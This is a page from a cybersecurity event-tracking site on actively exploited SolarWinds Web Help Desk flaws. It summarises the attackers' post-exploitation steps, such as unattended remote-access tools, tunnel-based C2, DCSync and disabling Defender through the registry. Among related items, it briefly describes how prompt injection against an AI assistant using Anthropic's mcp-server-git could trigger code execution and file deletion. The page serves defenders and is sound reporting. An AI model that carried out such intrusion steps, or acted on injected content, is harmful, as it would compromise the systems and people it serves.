CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Multiple Critical Vulnerabilities in SolarWinds Web Help Desk

First reported
Last updated
3 unique sources, 8 articles

Summary

Hide ▲

SolarWinds has released security updates to address multiple critical vulnerabilities in SolarWinds Web Help Desk, including CVE-2025-40536, CVE-2025-40537, CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, and CVE-2025-40554. These vulnerabilities could result in authentication bypass and remote code execution (RCE). CVE-2025-40551 is actively exploited in attacks and has been added to CISA's KEV catalog. SolarWinds Web Help Desk is used by more than 300,000 customers worldwide, including government agencies, large corporations, healthcare organizations, and educational institutions. SolarWinds has previously released a third patch to address a critical deserialization vulnerability (CVE-2025-26399) in Web Help Desk 12.8.7 and earlier versions. This flaw allows unauthenticated remote code execution (RCE) on affected systems. The vulnerability was discovered by an anonymous researcher and reported through Trend Micro's Zero Day Initiative (ZDI). The flaw is a patch bypass for CVE-2024-28988, which itself was a bypass for CVE-2024-28986. The original vulnerability was exploited in the wild and added to the KEV catalog by CISA. SolarWinds advises users to update to version 12.8.7 HF1 to mitigate the risk. SolarWinds Web Help Desk is a help desk and ticketing suite used by medium-to-large organizations for IT support request tracking, workflow automation, asset management, and compliance assurance. The vulnerability affects the AjaxProxy component, and the hotfix requires replacing specific JAR files. Microsoft has revealed that it observed a multi-stage intrusion that involved the threat actors exploiting internet-exposed SolarWinds Web Help Desk (WHD) instances to obtain initial access and move laterally across the organization's network to other high-value assets. The attackers used legitimate components associated with Zoho ManageEngine to enable persistent remote control over the infected system. They enumerated sensitive domain users and groups, established persistence via reverse SSH and RDP access, and conducted a DCSync attack to request password hashes and other sensitive information from an Active Directory (AD) database. Threat actors have been exploiting CVE-2025-40551 and CVE-2025-26399 to deploy legitimate tools for malicious purposes, such as Zoho ManageEngine and Velociraptor. The attackers targeted at least three organizations and leveraged Cloudflare tunnels for persistence. The malicious activity was spotted by researchers at Huntress Security and is believed to be part of a campaign that started on January 16. The attackers used Velociraptor for command and control (C2) and Zoho ManageEngine for remote monitoring and management. The attackers installed the Zoho ManageEngine Assist agent via an MSI file fetched from the Catbox file-hosting platform and configured the tool for unattended access. They registered the compromised host to a Zoho Assist account tied to an anonymous Proton Mail address. The attackers used Velociraptor as a command-and-control (C2) framework that communicates with attackers via Cloudflare Workers. The attackers used an outdated version of Velociraptor (0.73.4), which is vulnerable to a privilege escalation flaw. The attackers installed Cloudflared from Cloudflare's official GitHub repository as a secondary tunnel-based access channel for C2 redundancy. The attackers disabled Windows Defender and Firewall via registry modifications to ensure that fetching additional payloads would not be blocked. The attackers downloaded a fresh copy of the VS Code binary approximately a second after disabling Defender. System administrators are recommended to upgrade SolarWinds Web Help Desk to version 2026.1 or later, remove public internet access to SolarWinds WHD admin interfaces, and reset all credentials associated with the product.

Timeline

  1. 09.02.2026 16:42 2 articles · 8h ago

    Microsoft details multi-stage attacks exploiting SolarWinds Web Help Desk

    Threat actors have been exploiting CVE-2025-40551 and CVE-2025-26399 to deploy legitimate tools for malicious purposes, such as Zoho ManageEngine and Velociraptor. The attackers targeted at least three organizations and leveraged Cloudflare tunnels for persistence. The malicious activity was spotted by researchers at Huntress Security and is believed to be part of a campaign that started on January 16. The attackers used Velociraptor for command and control (C2) and Zoho ManageEngine for remote monitoring and management. The attackers installed the Zoho ManageEngine Assist agent via an MSI file fetched from the Catbox file-hosting platform and configured the tool for unattended access. They registered the compromised host to a Zoho Assist account tied to an anonymous Proton Mail address. The attackers used Velociraptor as a command-and-control (C2) framework that communicates with attackers via Cloudflare Workers. The attackers used an outdated version of Velociraptor (0.73.4), which is vulnerable to a privilege escalation flaw. The attackers installed Cloudflared from Cloudflare's official GitHub repository as a secondary tunnel-based access channel for C2 redundancy. The attackers disabled Windows Defender and Firewall via registry modifications to ensure that fetching additional payloads would not be blocked. The attackers downloaded a fresh copy of the VS Code binary approximately a second after disabling Defender. System administrators are recommended to upgrade SolarWinds Web Help Desk to version 2026.1 or later, remove public internet access to SolarWinds WHD admin interfaces, and reset all credentials associated with the product.

    Show sources
    Open in new tab
  2. 29.01.2026 11:00 6 articles · 11d ago

    SolarWinds releases updates for four critical Web Help Desk flaws

    Threat actors have been exploiting CVE-2025-40551 and CVE-2025-26399 to deploy legitimate tools for malicious purposes, such as Zoho ManageEngine and Velociraptor. The attackers targeted at least three organizations and leveraged Cloudflare tunnels for persistence. The malicious activity was spotted by researchers at Huntress Security and is believed to be part of a campaign that started on January 16. The attackers used Velociraptor for command and control (C2) and Zoho ManageEngine for remote monitoring and management. The attackers installed the Zoho ManageEngine Assist agent via an MSI file fetched from the Catbox file-hosting platform and configured the tool for unattended access. They registered the compromised host to a Zoho Assist account tied to an anonymous Proton Mail address. The attackers used Velociraptor as a command-and-control (C2) framework that communicates with attackers via Cloudflare Workers. The attackers used an outdated version of Velociraptor (0.73.4), which is vulnerable to a privilege escalation flaw. The attackers installed Cloudflared from Cloudflare's official GitHub repository as a secondary tunnel-based access channel for C2 redundancy. The attackers disabled Windows Defender and Firewall via registry modifications to ensure that fetching additional payloads would not be blocked. The attackers downloaded a fresh copy of the VS Code binary approximately a second after disabling Defender. System administrators are recommended to upgrade SolarWinds Web Help Desk to version 2026.1 or later, remove public internet access to SolarWinds WHD admin interfaces, and reset all credentials associated with the product.

    Show sources
    Open in new tab
  3. 23.09.2025 15:46 3 articles · 4mo ago

    SolarWinds releases hotfix for critical deserialization vulnerability in Web Help Desk

    The vulnerability is the third attempt to address the original flaw CVE-2024-28986. SolarWinds Web Help Desk is used by medium-to-large organizations for IT support request tracking, workflow automation, asset management, and compliance assurance. The vulnerability affects the AjaxProxy component and is caused by unsafe deserialization handling. The hotfix requires installing Web Help Desk version 12.8.7 and replacing specific JAR files.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support and PRA

BeyondTrust has patched a critical pre-authentication remote code execution (RCE) vulnerability (CVE-2026-1731, CVSS 9.9) in Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw could allow unauthenticated attackers to execute OS commands in the context of the site user, leading to unauthorized access, data exfiltration, and service disruption. The vulnerability affects RS versions 25.3.1 and prior, and PRA versions 24.3.4 and prior. Patches are available in RS versions 25.3.2 and later, and PRA versions 25.1.1 and later. Self-hosted customers must manually apply updates if not subscribed to automatic updates. The vulnerability was discovered on January 31, 2026, with approximately 11,000 exposed instances identified, including around 8,500 on-prem deployments. BeyondTrust secured all RS/PRA cloud systems by February 2, 2026. The flaw was discovered by Harsh Jaiswal and the Hacktron AI team. Threat actors can exploit the flaw through maliciously crafted client requests in low-complexity attacks that do not require user interaction. In June 2025, BeyondTrust fixed a high-severity RS/PRA Server-Side Template Injection vulnerability.

Open in new tab

Critical Authentication Bypass and RCE Flaws in SolarWinds Web Help Desk

SolarWinds has released patches for critical vulnerabilities in its Web Help Desk software, including authentication bypass and remote code execution (RCE) flaws. The vulnerabilities, reported by security researchers, can be exploited by unauthenticated attackers in low-complexity attacks. The company advises immediate patching due to the high risk of exploitation.

Open in new tab

Three Flaws in Anthropic MCP Git Server Enable File Access and Code Execution

Three vulnerabilities in the mcp-server-git, maintained by Anthropic, allow file access, deletion, and code execution via prompt injection. The flaws have been addressed in versions 2025.9.25 and 2025.12.18. The vulnerabilities include path traversal and argument injection issues that can be exploited to manipulate Git repositories and execute arbitrary code. The issues were disclosed by Cyata researcher Yarden Porat, highlighting the risks of prompt injection attacks without direct system access. The vulnerabilities affect all versions of mcp-server-git released before December 8, 2025, and apply to default installations. An attacker only needs to influence what an AI assistant reads to trigger the vulnerabilities. The flaws allow attackers to execute code, delete arbitrary files, and load arbitrary files into a large language model's context. While the vulnerabilities do not directly exfiltrate data, sensitive files may still be exposed to the AI, creating downstream security and privacy risks. The vulnerabilities have been assigned CVE-2025-68143, CVE-2025-68144, and CVE-2025-68145.

Open in new tab

Critical RCE Flaw in Trend Micro Apex Central On-Prem Windows

Trend Micro has addressed critical vulnerabilities in on-premise Windows versions of Apex Central, including a remote code execution (RCE) flaw (CVE-2025-69258) with a CVSS score of 9.8. The flaw allows unauthenticated remote attackers to execute arbitrary code under SYSTEM context. Two additional flaws (CVE-2025-69259, CVE-2025-69260) with CVSS scores of 7.5 each can cause denial-of-service conditions. The vulnerabilities affect versions below Build 7190 and require physical or remote access to exploit. Apex Central is a web-based management console that helps admins manage multiple Trend Micro products and services, including antivirus, content security, and threat detection. Trend Micro has released Critical Patch Build 7190 to address these vulnerabilities.

Open in new tab

CISA Adds Actively Exploited Microsoft Office and HPE OneView Vulnerabilities to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two vulnerabilities affecting Microsoft Office and HPE OneView to its Known Exploited Vulnerabilities (KEV) catalog, indicating active exploitation. The vulnerabilities include CVE-2009-0556 in Microsoft Office PowerPoint and CVE-2025-37164 in HPE OneView. The flaws allow for remote code execution and memory corruption. CISA urges federal agencies to apply patches by January 28, 2026, to mitigate risks. A proof-of-concept (PoC) exploit for CVE-2025-37164 has been publicly released, increasing the risk of exploitation.

Open in new tab